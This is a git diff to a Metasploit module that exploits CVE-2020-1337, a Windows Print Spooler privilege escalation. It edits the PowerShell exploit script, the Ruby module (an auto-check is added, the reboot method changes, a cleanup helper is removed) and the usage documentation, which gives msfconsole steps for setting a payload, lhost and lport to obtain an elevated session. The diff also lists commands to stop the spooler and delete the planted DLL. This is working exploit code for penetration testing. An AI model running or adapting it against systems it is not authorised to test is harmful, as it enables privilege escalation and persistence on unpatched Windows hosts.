diff --git a/data/exploits/CVE-2020-1337/cve-2020-1337.ps1 b/data/exploits/CVE-2020-1337/cve-2020-1337.ps1 index be68afaab7..ae87d57f54 100644 --- a/data/exploits/CVE-2020-1337/cve-2020-1337.ps1 +++ b/data/exploits/CVE-2020-1337/cve-2020-1337.ps1 @@ -74,31 +74,6 @@ $MethodDefinition = @" } return bSuccess; } - public static bool SendFileToPrinter(string szPrinterName, string szFileName) - { - // Open the file. - FileStream fs = new FileStream(szFileName, FileMode.Open); - // Create a BinaryReader on the file. - BinaryReader br = new BinaryReader(fs); - // Dim an array of bytes big enough to hold the file's contents. - Byte[] bytes = new Byte[fs.Length]; - bool bSuccess = false; - // Your unmanaged pointer. - IntPtr pUnmanagedBytes = new IntPtr(0); - int nLength; - nLength = Convert.ToInt32(fs.Length); - // Read the contents of the file into the array. - bytes = br.ReadBytes(nLength); - // Allocate some unmanaged memory for those bytes. - pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength); - // Copy the managed byte array into the unmanaged array. - Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength); - // Send the unmanaged bytes to the printer. - bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength); - // Free the unmanaged memory that you allocated earlier. - Marshal.FreeCoTaskMem(pUnmanagedBytes); - return bSuccess; - } } } "@; diff --git a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md index 45ac103498..31dc6efb68 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md @@ -20,24 +20,31 @@ but the link will be in place when the print takes place, so the file write will pass through and end up in the trusted location. When the printer is created, the target will show a pop-up saying a -printer weas created. +printer was created. A larger issue here is that the Spooler service does not like to stop. Trying `sc stop` Spooler does not stop the spooler. Killing the pid with a trusted process will kill it, but it restarts automatically. Using the `pendingFileRenameOperations` registry key also does not appear to work. +To remove the dll, you can: +`sc config spooler start= disabled` +`taskkill /F /IM spoolsv.exe` +`del ualapi.dll` +`sc config spooler start= auto` +`sc start spooler` ## Verification Steps Start ```msfconsole``` - get session on a windows target that is not patched (and <= 2003) + get session on a windows target that is not patched (and <= windows 10 version 2004) ```use windows/local/cve_2020_1337_printerdemon``` ```set session ``` ```set payload ``` ```set lhost ``` ```set lport ``` ```run``` + Reboot twice Verify you get a session diff --git a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb index e8434608e0..5dac554a13 100644 --- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb +++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb @@ -15,6 +15,8 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Windows::Powershell + prepend Msf::Exploit::Remote::AutoCheck + def initialize(info = {}) super( update_info( @@ -92,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Local # Run Exploit Script print_status("Running Exploit on #{sysinfo['Computer']}") - vprint_status(script) begin #client.powershell.execute_string(code: script) session.powershell.execute_string({code: script}) @@ -138,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Rebooting #{sysinfo['Computer']}") reboot_command = 'shutdown /r' begin - cmd_exec('cmd.exe', "/c #{reboot_command}") + session.sys.power.reboot rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') @@ -168,20 +169,6 @@ class MetasploitModule < Msf::Exploit::Local build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Build Number = #{build_num}") return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363 - return Exploit::CheckCode::Safe end - - def ensure_clean_destination(path) - return unless file?(path) - - print_status("#{path} already exists on the target. Deleting...") - begin - file_rm(path) - print_status("Deleted #{path}") - rescue Rex::Post::Meterpreter::RequestError => e - elog(e) - print_error("Unable to delete #{path}") - end - end end